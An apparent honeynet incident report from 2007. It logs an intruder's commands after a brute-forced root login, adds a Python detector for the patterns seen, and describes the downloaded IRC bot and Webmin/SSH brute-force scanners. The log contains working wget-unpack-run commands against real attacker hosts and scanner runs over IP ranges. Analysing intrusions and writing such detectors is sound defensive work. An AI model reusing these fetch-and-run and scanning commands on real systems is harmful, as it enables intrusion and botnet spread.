
Hackers inside

2007-05-07 20:38:57

After successfully guessing the root account password with a dictionary brute-force attack and adding the user roman, the attacker ran these commands:

<pre>
wget http://rengeri.xhost.ro/boti.tar
tar xzvf boti.tar
cd " "
./linux
cd
cat /proc/cpuinfo
w
ls
cd /tmp
ls
cd
cat /proc/cpuinfo
wget www.parazit.eu/p/john.tgz
tar xzvf john.tgz
cd scan-webmin
ls
./scan 203.5
cd
ls
rm -rf john.tgz scan-webmin
wget myliftclub.com/xxxz.gz
tar xzvf xxxz.gz
cd x
chmod +x *
chmod +w *
./go 201.91
./go 201.91
cd
wget http://sirdulce.xhost.ro/Noteam.tgz
tar xzvf Noteam.tgz
cd "... "
./x 201.91
./x 201.91 22
./x 38.119 22
w
ls
wget http://sirdulce.xhost.ro/zH.tar.gz
tar xzvf zH.tar.gz
cd zH
mv data.conf.txt data.conf
./start 201
cat vuln.txt
cd zH
cat vuln.txt
w
</pre>
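The session above repeats two patterns that are cheap to alert on: a downloaded archive is unpacked and a binary is run from it, and the working directory is a name made only of whitespace or dots. The following is an added example, not part of the original report, that flags both in a recorded command list; the function names, rule names and the `host.example` URLs are assumptions, and the sample is a constructed excerpt modelled on the commands above.

```python
import re
import shlex

FETCHERS = {"wget", "curl"}

def hidden_dir(name):
    """True for names made only of whitespace and dots, such as " " or "... "."""
    return name not in (".", "..") and re.fullmatch(r"[\s.]+", name) is not None

def analyze(commands):
    """Return (line_no, rule, command) findings for an ordered list of shell commands."""
    findings, fetched, unpacked = [], set(), False
    for no, cmd in enumerate(commands, 1):
        try:
            argv = shlex.split(cmd)
        except ValueError:              # unbalanced quotes: skip the line
            continue
        if not argv:
            continue
        prog, args = argv[0], argv[1:]
        if prog in FETCHERS and args:
            # Assumption: the URL is the last argument; keep its basename.
            fetched.add(args[-1].rstrip("/").rsplit("/", 1)[-1])
        elif prog == "tar" and fetched.intersection(args):
            unpacked = True             # session-wide flag, deliberately coarse
            findings.append((no, "extract-downloaded-archive", cmd))
        elif prog == "cd" and args and hidden_dir(args[0]):
            findings.append((no, "hidden-directory", cmd))
        elif prog.startswith("./") and unpacked:
            findings.append((no, "exec-after-download", cmd))
    return findings

# Constructed sample: command shapes from the session above, placeholder hosts.
SAMPLE = [
    "wget http://host.example/boti.tar",
    "tar xzvf boti.tar",
    'cd " "',
    "./linux",
    "cd",
    "cat /proc/cpuinfo",
    "w",
    "wget http://host.example/Noteam.tgz",
    "tar xzvf Noteam.tgz",
    'cd "... "',
    "./x 201.91 22",
]

if __name__ == "__main__":
    for no, rule, cmd in analyze(SAMPLE):
        print(f"{no:>3}  {rule:<28} {cmd}")
```

Plain `cd ..` and a `./configure` run with no preceding download produce no findings, so the rules stay quiet on ordinary administration.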

http://rengeri.xhost.ro/boti.tar

An Emech IRC bot configured to connect to Undernet servers, channel #Snifer.

And redirection to these channels:
channel #allein
channel #bochum
channel #Beby
channel #radioeclipsa
channel #Haçk m3n

www.parazit.eu/p/john.tgz

Webmin scanner; see http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html, no other comment needed...

myliftclub.com/xxxz.gz

An extended Webmin scanner connected to John the Ripper, using an exploit for xml.

http://sirdulce.xhost.ro/Noteam.tgz

SSH brute-force scanner, with a directory containing scripts for scanning Horde servers.

Header:
<pre>
"#=====#==================================#======#"
"#= Z =# SSH-BREAKER SECURITY-ATACK V-4.1 #= Z =#"
"#= i =#--------- #Noteam ---------#= i =#"
"#= D =#-----------------------------------#= D =#"
"#= a =# ® ALL RIGHTS RESERVED BY SirDulcee®#= a =#"
"#= N =#===================================#= N =#"
</pre>

http://sirdulce.xhost.ro/zH.tar.gz

Another SSH scanner, header:
UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]


©2005-2010  Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Czech Republic License. info_at_honeynet_dot_cz, irc.honeynet.cz #honeynet.cz